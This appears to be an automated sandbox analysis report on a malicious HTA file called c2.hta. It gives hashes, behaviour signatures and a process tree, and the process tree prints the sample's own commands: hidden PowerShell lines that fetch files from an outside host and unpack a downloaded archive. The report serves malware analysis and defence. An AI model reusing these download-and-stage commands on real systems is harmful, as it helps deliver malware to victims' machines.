Overview

overview

10

Static

static

1

c2.hta

windows7-x64

8

c2.hta

windows10-2004-x64

10

Analysis

  • max time kernel
    120s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    07-01-2025 05:22

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    c2.hta

  • Size

    78KB

  • MD5

    5c4995910d7c98dad7366a0519fe4558

  • SHA1

    c9ed46e4dcc3e24e484b16d2896e5b2c15595ad5

  • SHA256

    2ca1167b2c7a42f82c22c1349ce52569820fb0416463e60262b5481ac4926e0a

  • SHA512

    51bf112ce906df871e68620e0af8bd43cecd72a296054c0fdd6f3f07250668d33277f66725631ef68f8ba8d1304cbbccd6284a9d73323ef1ae19f977c9c208e6

  • SSDEEP

    768:O0cJbc1rmDYpxPJOT90Qg9iJrCufW0UYckMCRcZmy2U072dtxZ:f6bctm8D4T9FhWVRUUtf

Score
8/10
discoveryexecution

Malware Config

Signatures

  • Blocklisted process makes network request 7 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell and hide display window.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Modifies system certificate store 2 TTPs 7 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\c2.hta"
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:2180
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\temp.bat"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2688
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\Admin\Downloads\W2.pdf"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2664
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\Admin\AppData\Local\Temp\msword.zip"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2700
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\Admin\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\Admin\AppData\Local\Temp\msword -Force"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1440
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\cleanup.bat"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1948
      • C:\Windows\SysWOW64\timeout.exe
        timeout /t 10
        3⤵
        • System Location Discovery: System Language Discovery
        • Delays execution with timeout.exe
        PID:320

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Cab9E73.tmp
    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Tar9EA5.tmp
    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\cleanup.bat
    Filesize

    170B

    MD5

    63673ea7bc3c3ceb411c3d8b3815c74e

    SHA1

    be80cd9fdbd85d2288faa1d6f52ab5d3e7351864

    SHA256

    411864785adc0d1555e58724ff0c710c1b9758e93c6d816c6a1b7b04728c5a0b

    SHA512

    68d6496b608df962942ac1f9af1fdbe2223b7540d1ec3f293281f184d5fc96e0e6c4baa001a452a66d20684e8ca0148c0abf027a4d051262df42b24b3222cea5

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\temp.bat
    Filesize

    498B

    MD5

    e8dfdb915a523a09e139aaa900991ddd

    SHA1

    d23f4798c549bfb7ddd968c4c2a971f67468a662

    SHA256

    91619737b3f7af4623dc62b4f3df7b551337ec94f693a3b9ba35bb231483393e

    SHA512

    b4e737d1c80420688bf856df02a580b691d120307b7d31ea4766448ccd0c6eec7b2c48424691e92dffba58ca8c9a8df989f5b683d9363cac37d3dd3e5ad1623e

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    0e022f5d5b843d1b8d27b53040440b15

    SHA1

    a537ef25acac99d930b3a2f5c91a7d32e414351b

    SHA256

    1f8d285bd7f16e2ddb7cc552bbfe560aa87c2562c665bab5044c11281b838a39

    SHA512

    8c4011ed919f91f1d3ca827fa02ff4d4d7e97efe85c8d96f29c6e8532de9e2240aadf83c492192df1ef5aa6fcbea5f2c94852a5be4cc0b7081d967f4c4a81508

    Download Submit